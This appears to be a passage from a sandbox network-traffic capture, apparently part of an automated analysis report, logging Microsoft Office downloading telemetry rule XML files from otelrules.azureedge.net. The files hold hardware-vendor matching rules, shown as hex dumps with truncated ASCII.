                                                                                        2024-11-30 11:48:07 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        22192.168.2.44976613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:06 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:07 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:06 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB344914B"
                                                                                        x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114806Z-174f78459684bddphC1EWRbht40000001100000000009r1e
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:07 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        23192.168.2.44977213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:08 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:09 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                        ETag: "0x8DC582BA41997E3"
                                                                                        x-ms-request-id: 106d127d-401e-008c-1a91-3f86c2000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114808Z-174f7845968qj8jrhC1EWRh41s000000118g000000008c7q
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:09 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        24192.168.2.44977113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:08 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:09 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 469
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                        ETag: "0x8DC582BBA701121"
                                                                                        x-ms-request-id: 417b6c53-401e-0029-0d91-3f9b43000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114808Z-174f78459685m244hC1EWRgp2c000000118g000000003h0r
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:09 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        25192.168.2.44977313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:08 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:09 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:08 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 477
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                        ETag: "0x8DC582BB8CEAC16"
                                                                                        x-ms-request-id: e94c41b0-301e-0000-6d41-41eecc000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114808Z-174f784596886s2bhC1EWR743w00000011cg000000006vps
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:09 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        26192.168.2.44977413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:08 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:09 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:09 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 464
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                        ETag: "0x8DC582B97FB6C3C"
                                                                                        x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114809Z-174f7845968j6t2phC1EWRcfe800000011k0000000004p2m
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:09 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        27192.168.2.44977513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:08 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:09 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:09 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 494
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB7010D66"
                                                                                        x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114809Z-174f7845968xr5c2hC1EWRd0hn0000000k4g000000009ezn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:09 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        28192.168.2.44977613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:10 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:11 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:11 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 419
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                        ETag: "0x8DC582B9748630E"
                                                                                        x-ms-request-id: 7e299a61-c01e-0049-0c07-41ac27000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114811Z-174f7845968ljs8phC1EWRe6en00000011ag00000000139x
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:11 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        29192.168.2.44977713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:10 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:11 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:11 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 472
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                        ETag: "0x8DC582B9DACDF62"
                                                                                        x-ms-request-id: 264c510b-001e-000b-0eb2-4215a7000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114811Z-174f78459684bddphC1EWRbht400000011400000000053k8
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:11 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        30192.168.2.44977913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:11 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:11 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:11 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 468
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                        ETag: "0x8DC582B9C8E04C8"
                                                                                        x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114811Z-174f7845968jrjrxhC1EWRmmrs00000011mg000000001n1c
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:11 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        31192.168.2.44977813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:11 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:11 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:11 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 404
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                                                                        ETag: "0x8DC582B9E8EE0F3"
                                                                                        x-ms-request-id: 4ee01645-001e-0017-38b5-420c3c000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114811Z-174f78459684db9fhC1EWRc7g400000001cg000000005gdw
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:11 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        32192.168.2.44978013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:11 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:11 UTC470INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:11 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 428
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
